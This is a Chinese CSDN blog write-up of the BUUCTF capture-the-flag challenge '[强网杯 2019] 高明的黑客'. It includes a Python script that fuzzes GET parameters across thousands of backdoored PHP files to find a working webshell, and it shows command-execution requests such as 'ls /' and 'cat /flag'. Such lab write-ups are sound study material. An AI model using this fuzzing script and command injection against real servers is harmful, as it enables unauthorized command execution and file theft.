BUUCTF [强网杯 2019] 高明的黑客

最新推荐文章于 2023-01-31 11:20:47 发布
最新推荐文章于 2023-01-31 11:20:47 发布
阅读量332 收藏
点赞数
分类专栏: BUUCTF WEB Writeup 文章标签: BUUCTF 强网杯2019 writeup 高明的黑客
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44037296/article/details/110822330
版权

BUUCTF [强网杯 2019] 高明的黑客

启动环境:
在这里插入图片描述
提示备份了网站源码到www.tar.gz,在连接后添加后缀,下载源码:
在这里插入图片描述
随机打开几个文件:
在这里插入图片描述
在这里插入图片描述
可以查看到存在GETPOST传参,并且之后使用了system()函数,可能存在命令执行漏洞。
所以需要从大批量php文件中找到有回显的传参,编写Python 3脚本:

import requests
import os
import re

url = 'http://xxx/'
path = '/Users/Downloads/src'

ptn_get = re.compile(br"\$_GET\['(\w+)'\]")
ptn_res = re.compile(br'success_hack')

count = 0

for f in list(os.scandir(path)):
    print(str(f)[11:-2])
    count += 1

    with open(f.path, 'rb') as fp:
        data = fp.read()

    for get in set(ptn_get.findall(data)):
        get = get.decode('ascii')
        cmd = 'echo "success_hack";'

        r = requests.get(url + f.name, params={get: cmd})
        if ptn_res.search(r.content) is not None:
            print(f.name, get)
            exit()

应该使用多线程,等了很长时间,得到结果:
在这里插入图片描述
查看xk0SzyKwfzw.php
在这里插入图片描述

先访问xk0SzyKwfzw.php页面:
在这里插入图片描述
在传入参数Efa5BVGxk0SzyKwfzw.php?Efa5BVG=ls,得到当前文件夹下内容:
在这里插入图片描述
判断出命令ls执行成功,之后就是简单的命令执行,查看根目录:xk0SzyKwfzw.php?Efa5BVG=ls /

打开flagxk0SzyKwfzw.php?Efa5BVG=cat /flag
在这里插入图片描述
通过对GET传参的爆破,得到真正的参数,再通过命令执行,得到flag

Senimo_
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF [强网杯 2019]高明黑客
qq_42158602的博客
01-14 1095
根据提示在url/www.tar.gz拿到源码 随便打开几个看看 有很多shell 不过都是些不能用的 由于文件太多还是些脚本跑吧 (python3) import os import re import requests from multiprocessing import Pool filePath = "E:\phpstudy_pro\WWW\src" url = "http://1...
buuctf web [强网杯 2019]高明黑客
m0_46412682的博客
07-20 655
buuctf web [强网杯 2019]高明黑客 开始的页面 既然页面上有提示,我们就输入www.tar.gz 有文件压缩包,我们下载下来,压缩打开后,有几千个文件 这里我们随便打开一个文件,这里有很多shell,但是很多是用不了的,所以要用python来测试,不可能手动 import requests import os import re import threading import time session = requests.Session() session.keep_
buuctf-web-[强网杯 2019]高明黑客1
mlws1900的博客
08-20 416
解题思路就是用get和post对所有文件进行挨个传参,一句话返回一个预定的值就利用该文件来获取flag。借其他大佬的脚本一用(跟扫目录返回状态码一个思路)直接复制www.tar.gz下载源码。打开发现很多个php文件。随机打开一个,观察源代码。利用以下payload。
BUUCTF[强网杯 2019]高明黑客
qq_44749590的博客
06-08 530
高明黑客BUUCTF
[强网杯 2019]高明黑客
记录学习,一起进步
01-31 404
[强网杯 2019]高明黑客
BUUCTF】web之强网杯2019随便注
12-14
开始注入: 1’ : 报错 1’ #:回显正常 1’ order by 1 #: 正常(经测试列数为2–此处小白暗自窃喜) 1’ union select 1,2#: 回显 如图 看来此方法是行不通了,但经过苦苦寻求,了解到了堆叠注入: ...
BUUCTF逆向前八题
最新发布
01-24
在本篇中,我们将探讨在BUUCTF储备赛中遇到的前八道逆向题目,通过这些题目来学习如何使用逆向工具,如exeinfo和IDA,以及如何解析汇编代码以获取关键信息。 1. Easyre: 这道题首先使用exeinfo查看文件信息,确认...
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
BasicASM.s(BUUCTF
06-04
分析过程文件
2020网鼎杯青龙组Boom
05-12
【标题】"2020网鼎杯青龙组Boom" 涉及的是一个网络安全竞赛的场景,其中"网鼎杯"是中国国内知名的网络安全技术大赛,旨在提升参赛者的网络安全技能和应急处理能力。"青龙组"可能是比赛中的一个分组或者阶段,可能...
CTF-BUUCTF-Web-[强网杯 2019]高明黑客
qq_42404383的博客
01-01 765
CTF-BUUCTF-Web-[强网杯 2019]高明黑客 如题: 解题: 没看到其他任何提示,直接down下源码 我的娘哦!这要看到何时去? 盲猜大概要自己写脚本,然后分析代码 [致敬大佬,借用脚本]: https://blog.csdn.net/xiayu729100940/article/details/102676405 import os import requests impor...
Writeup】BUUCTF_Web_高明黑客
BAKUMANSEC - Just Do It
08-19 1161
0x01 解题思路   这题下载源码一看似乎有很多一句话木马,但是大多数根本没法执行命令,而且文件和参数都比较多,所以比较普遍的做法是本地搭个环境(PHP7)尝试所有的GET和POST参数。CTF Writeups给的wp:https://www.ctfwp.com/articals/2019qiangwang.html#%E9%AB%98%E6%98%8E%E7%9A%84%E9%BB%91%...
BUUCTF—WEB-高明黑客
迷风小白
06-25 6801
高明黑客 下载www.tar.gz 发现是很多混乱的shell,不过某些地方还是有迹可循的,可以通过$_GET或者$_POST传参回显 可以写个脚本批量扫描一下文件里的$_GET和$_POST,然后统一赋值echo "got it",如果回显结果中包含got it,那么证明该文件为可用shell python脚本如下: import os import requests from mult...
BUUCTF】[强网杯 2019]高明黑客
aoao331198的博客
04-26 2326
拿到的源码有3000多个文件,所有文件都是杂乱的 网上wp感觉对题目的理解部分讲解较少,结合蚁剑工具,我觉得题目意思像是说这里面的文件是一句话木马,我们要找到合适的GET或POST参数能执行shell命令。 用脚本暴力跑完所有文件的所有参数,技术不行,只能贴别人的代码 import os import requests import re import threading import time print('开始时间: '+ time.asctime( time.localtime(time.ti.
BUUCTF web 高明黑客 (fuzzing)
H4ppyD0g的博客
02-23 763
提示源码备份www.tar.gz,就访问这个uri,下载一个压缩包,里面有三千多个php文件,打开几个看看,如果有写过小马的就可以很容易发现几乎每个文件都有好多小马。但是大多数都不好用,到这里不会了,看wp。 说是这个题考的模糊测试,也就是fuzzing,又学新知识了。。 知识盲区 Fuzzing是指通过构造测试输入,对软件进行大量测试来发现软件中的漏洞的一种模糊测试方法。 可通过向目标系统提供...
强网杯高明黑客
SopRomeo的博客
04-10 350
下载源码,发现里面有3002个文件,随便打开一个文件看看 可以发现里面有很多没用的参数,打开其他文件也是这样,既然有这么多文件都是这样,是不是需要遍历文件,来获取可用的请求参数呢,例如eval,system等函数 在本地搭个环境跑 使用多线程的时候注意上锁,不然服务器会拒绝访问 我参考了这篇文章的思路 就是一次发送所以的请求,再慢慢找 之前我是慢慢遍历,真的没用,以后得多练练编程思路 放上我根...
[强网杯 2019]高明黑客(每日一题)
qq_51684648的博客
09-07 1009
[强网杯 2019]高明黑客(每日一题) 1,打开网页,发现提示,下载文件 2,发现了三千多个php文件,打开几个文件,发现有可以传参的地方,尝试传参,但命令并没有被执行。 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-RfKq4Y6p-1631019565642)(https://i.loli.net/2021/09/07/yVeIzNdU5c8Ebar.png)] 3,猜测这三千多文件里有能被利用的shell,于是编写脚本尝试(我好菜,只能抄大佬们的脚本,在学了在学
buuctf-强网杯2019随便注
09-03
buuctf-强网杯2019随便注是一场2019强网杯举办的CTF比赛中的一道题目。这道题目的名称暗示着它是一个与注入漏洞相关的题目。 注入漏洞是一种网络安全漏洞,攻击者可以通过在用户输入的数据中注入恶意代码来获取...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值